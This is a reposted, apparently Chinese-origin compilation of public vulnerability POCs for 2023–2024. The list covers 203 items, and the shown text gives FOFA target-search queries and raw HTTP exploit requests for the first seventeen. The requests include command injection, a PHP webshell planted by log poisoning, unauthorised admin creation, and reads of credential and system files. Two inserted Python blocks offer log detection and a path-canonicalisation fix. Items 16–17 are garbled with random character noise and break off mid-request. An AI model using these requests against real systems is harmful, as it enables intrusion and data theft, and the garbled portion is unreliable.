Public Internet Vulnerability Compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
This article is reposted from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. We hope this article helps with defense; defenders can use its contents to check their own exposure.

Sources: the article covers 203 public high-impact vulnerability POCs disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Patches: all of these vulnerabilities are public; contact the product vendor for patches or remediation guidance.

Content: for reasons of length, a few POCs that are too long have their payload replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's message backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to receive the full list". This article is the most complete version; use your browser's find-in-page to search for keywords.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).
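The purpose statement above says defenders can use the list for exposure checks. As an added example (not part of the original article), the Python below shows one way to turn the POCs that follow into log-side detection: each request line is percent-decoded repeatedly, so single- and double-URL-encoded forms of the same payload (the 稻壳CMS keyword probe is double-encoded) hit the same rule, and is then matched against indicators lifted from the requests in this list. The log lines are constructed for the example, the indicator set is illustrative rather than complete, and body-borne payloads (fastjson, log4j, SOAP) can only be matched where the log source records request bodies, as a WAF or reverse proxy may; a plain access log carries only the request line.

```python
"""Indicator matching for the POCs in this article, run over constructed
web-server log lines.  Added example, not code from the original article."""
from __future__ import annotations

import re
from urllib.parse import quote, unquote_plus

# (label, regex).  Patterns are applied to the request line (or a request body,
# where the log source records one) after repeated percent-decoding and
# lower-casing, so encoded variants of the same payload hit the same rule.
INDICATORS = [
    ("path traversal", re.compile(r"(^|/)\.\.(/|\?|$)")),          # Casdoor /static/../, jshERP a.ico/../
    ("jsherp getalllist", re.compile(r"/jsherp-boot/user/.*getalllist")),  # ;.ico and /../ variants
    ("nuuo debugging_center_utils", re.compile(r"/__debugging_center_utils___\.php")),
    ("sangfor loadfile", re.compile(r"/svpn_html/loadfile\.php\?file=")),
    ("dahua icc readpic file uri", re.compile(r"/evo-cirs/file/readpic\?fileurl=file:")),
    ("log4shell jndi", re.compile(r"\$\{jndi:")),
    ("fastjson autotype", re.compile(r'"@type"\s*:\s*"(com\.alibaba\.fastjson\.|java\.net\.url)')),
    ("mysql error-based sqli", re.compile(r"\b(updatexml|extractvalue)\s*\(")),
    ("mssql time-based sqli", re.compile(r"\bwaitfor\s+delay\b")),
    ("oracle time-based sqli", re.compile(r"dbms_pipe\.receive_message")),
]

# Quoted request line inside a combined-format access log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(text: str, max_rounds: int = 3) -> str:
    """Percent-decode until the text stops changing (bounded), so the
    double-URL-encoded keyword payload decodes to its plain form."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_indicators(text: str) -> list[str]:
    """Return the labels of every indicator present in a request line or body."""
    decoded = fully_decode(text).lower()
    return [label for label, rx in INDICATORS if rx.search(decoded)]


def scan_log(lines: list[str]) -> dict[int, list[str]]:
    """Map 1-based line numbers of matching log lines to their indicator labels."""
    hits: dict[int, list[str]] = {}
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        labels = find_indicators(m.group("target"))
        if labels:
            hits[n] = labels
    return hits


# The 稻壳CMS keyword probe from the article, double-URL-encoded as the
# article instructs (built here rather than hand-typed).
DOCCMS_PAYLOAD = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"
DOCCMS_ENCODED = quote(quote(DOCCMS_PAYLOAD, safe=""), safe="")

# Constructed sample log lines; client IPs, timestamps and sizes are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Jun/2024:07:41:00 +0800] "GET /static/../../../../etc/passwd HTTP/1.1" 200 1836 "-" "curl/8.0"',
    '198.51.100.7 - - [05/Jun/2024:07:41:01 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 4102 "-" "curl/8.0"',
    '198.51.100.7 - - [05/Jun/2024:07:41:02 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 4102 "-" "curl/8.0"',
    f'198.51.100.7 - - [05/Jun/2024:07:41:03 +0800] "GET /search/index.php?keyword={DOCCMS_ENCODED} HTTP/1.1" 500 312 "-" "curl/8.0"',
    '198.51.100.7 - - [05/Jun/2024:07:41:04 +0800] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1\'waitfor+delay+\'0:0:5\'-- HTTP/1.1" 200 88 "-" "curl/8.0"',
    '203.0.113.9 - - [05/Jun/2024:07:41:05 +0800] "GET /static/css/app.css HTTP/1.1" 200 9021 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Jun/2024:07:41:06 +0800] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 21 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for n, labels in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(labels)}")
```

Decoding is bounded at three rounds on purpose: an unbounded loop lets an attacker keep a matcher busy, and anything that needs more than two rounds to become readable is itself worth an alert. Web servers log the request line as received, which is why the `..` segments are still visible here; a proxy that normalises before logging would hide them, so check what your log source actually records.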

Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP (jshERP) getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua (大华) ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua (大华) ICC intelligent IoT integrated management platform random remote code execution
22. Dahua (大华) ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua (大华) ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou (用友) NC registerServlet JNDI remote code execution
26. Yonyou (用友) NC linkVoucher SQL injection
27. Yonyou (用友) NC showcontent SQL injection
28. Yonyou (用友) NC grouptemplet arbitrary file upload
29. Yonyou (用友) NC down/bill SQL injection
30. Yonyou (用友) NC importPml SQL injection
31. Yonyou (用友) NC runStateServlet SQL injection
32. Yonyou (用友) NC complainbilldetail SQL injection
33. Yonyou (用友) NC downTax/download SQL injection
34. Yonyou (用友) NC warningDetailInfo interface SQL injection
35. Yonyou (用友) NC-Cloud importhttpscer arbitrary file upload
36. Yonyou (用友) NC-Cloud soapFormat XXE
37. Yonyou (用友) NC-Cloud IUpdateService XXE
38. Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE
39. Yonyou (用友) U8 Cloud RegisterServlet SQL injection
40. Yonyou (用友) U8-Cloud XChangeServlet XXE
41. Yonyou (用友) U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou (用友) GRP-U8 SmartUpload01 file upload
43. Yonyou (用友) GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou (用友) GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou (用友) GRP-U8 ufgovbank XXE
46. Yonyou (用友) GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou (用友) GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou (用友) U8 CRM swfupload arbitrary file upload
49. Yonyou (用友) U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet (畅捷通) T+ getdecallusers information disclosure
56. Chanjet (畅捷通) T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition all-in-one smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
70. Wanhu (万户) ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus-in-hand service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision (海康威视) operations management center session command execution
93. QiAnXin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin (奇安信) 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 (lean value management system) DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. Realor (瑞友) 天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet access management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 (WeEngine) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC List

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
Send the path exactly as written: browsers and most HTTP libraries collapse the ../ segments before sending, so the probe never reaches the server in that form (curl needs --path-as-is).
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user addition
FOFA: title="EasyCVR"
Set password to the MD5 hash of the password you want to use.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
The requested path is the application's JDBC configuration, i.e. the database credentials.
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin interface with the default account admin first, then send the request below. The stok value in the URL and the sysauth cookie are the ones issued by that login; the %s placeholders are left as they appear in the source POC. The injected command is the id in the wifiRebootrange field.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
The upload response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
The probe compares the integer 1 with @@version; on SQL Server the failed conversion raises an error that echoes the version string.
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. The language parameter traverses to the application's log directory, so the PHP in the login field is written into the log file; that code runs system() on the base64-decoded value of the K1SYJPMHLU4Z request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: request the poisoned log file through the page viewer to run the command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command (echo ---------;id 2>&1;echo ---------;). The log file name carries the date of the request that wrote the payload (log-2023-10-24 here, matching the Date header of the response above), so adjust it to the current date.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP (jshERP) getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. This reaches the same endpoint as item 14 through a different mangling of the path: a dummy a.ico segment followed by /.. instead of the ;.ico suffix. As with item 2, the ../ must be sent unnormalised.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

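Items 14 and 15 above reach one endpoint through two different manglings of its path: a ;.ico matrix-parameter suffix and a dummy a.ico/.. segment. Both are consistent with an access rule that inspects the raw request path while the routing layer dispatches on the canonical one (a servlet container such as Tomcat strips ;name=value path parameters and collapses .. before routing). The Python below is an added illustration of that bypass class and of the fix, canonicalise before you authorise. The "static asset exemption" rule is a hypothetical one written for this example; it is not jshERP's code, and the exact rule jshERP used is not stated in this article.

```python
"""A raw-path access rule bypassed by ';.ico' and 'a.ico/..' (items 14 and 15),
beside the canonical-path form that closes it.  Added example with a
hypothetical rule; not jshERP's code."""
from __future__ import annotations

from posixpath import normpath
from urllib.parse import unquote

PROTECTED_ENDPOINT = "/jshERP-boot/user/getAllList"   # endpoint named in the article
STATIC_EXTENSIONS = (".ico", ".css", ".js")           # hypothetical exemption list


def naive_is_public(raw_path: str) -> bool:
    """Exempt 'static assets' by looking for an extension anywhere in the raw
    path.  Both article requests satisfy this, yet neither is a static asset."""
    return any(ext in raw_path for ext in STATIC_EXTENSIONS)


def canonical_path(raw_path: str) -> str:
    """Reduce a request path to the form the router will actually dispatch on:
    query string dropped, one round of percent-decoding (the same single round
    the server performs; decoding more would create a new mismatch), ';param'
    path parameters stripped per segment, '.'/'..' resolved under '/'."""
    path = unquote(raw_path.split("?", 1)[0])
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    joined = "/".join(segments)
    path = normpath(joined if joined.startswith("/") else "/" + joined)
    if path.startswith("//"):           # posixpath keeps a double leading slash
        path = "/" + path.lstrip("/")
    return path


def hardened_is_public(raw_path: str) -> bool:
    """Same exemption, decided on the canonical path and by suffix only."""
    return canonical_path(raw_path).endswith(STATIC_EXTENSIONS)


def needs_auth(rule, raw_path: str) -> bool:
    """True when the given rule would send this request through authentication."""
    return not rule(raw_path)


if __name__ == "__main__":
    for probe in ("/jshERP-boot/user/getAllList;.ico",
                  "/jshERP-boot/user/a.ico/../getAllList",
                  "/jshERP-boot/user/%2e%2e/getAllList",
                  "/favicon.ico"):
        print(f"{probe:42} naive: {'auth' if needs_auth(naive_is_public, probe) else 'open'}"
              f"  hardened: {'auth' if needs_auth(hardened_is_public, probe) else 'open'}"
              f"  canonical={canonical_path(probe)}")
```

The hardened rule still exempts a real /favicon.ico, so the fix does not break static content; it only makes the authorisation layer and the router agree on what path they are looking at. A stronger design drops the exemption altogether and serves static assets from a prefix that contains no application endpoints.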
16. 红帆HFOffice医微云SQL注入' {5 d4 z, {: s; C
FOFA:title="HFOffice". ~6 I; d4 I! |) _1 x: a0 M
poc中调用函数计算1234的md5值7 A9 R) w; q+ ^" s
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.13 L. u! B3 w, P' u4 V
Host: x.x.x.x+ V7 P* q; E, m. ^% v% w1 b
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
' q* k9 q ? ]Connection: close
# m$ [+ T3 y& Y5 L4 EAccept: */*
/ y9 l8 U% Q' @5 _Accept-Language: en2 L! E: S: n! Z2 n4 g4 b; J/ d
Accept-Encoding: gzip: l9 N2 i! @. [
2 f# B! A" P2 k7 [6 ~. O6 D' H
17. 大华 DSS itcBulletin SQL 注入
3 A! { H# F- VFOFA:app="dahua-DSS"
3 r) L) ^/ h$ G; l* V5 vPOST /portal/services/itcBulletin?wsdl HTTP/1.1+ }6 M7 }$ a, ]5 w# Z( Y
Host: x.x.x.x
! }- N# K4 @# J: O, t' a4 f: wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 X& }3 Z: g u; ]: U
Connection: close
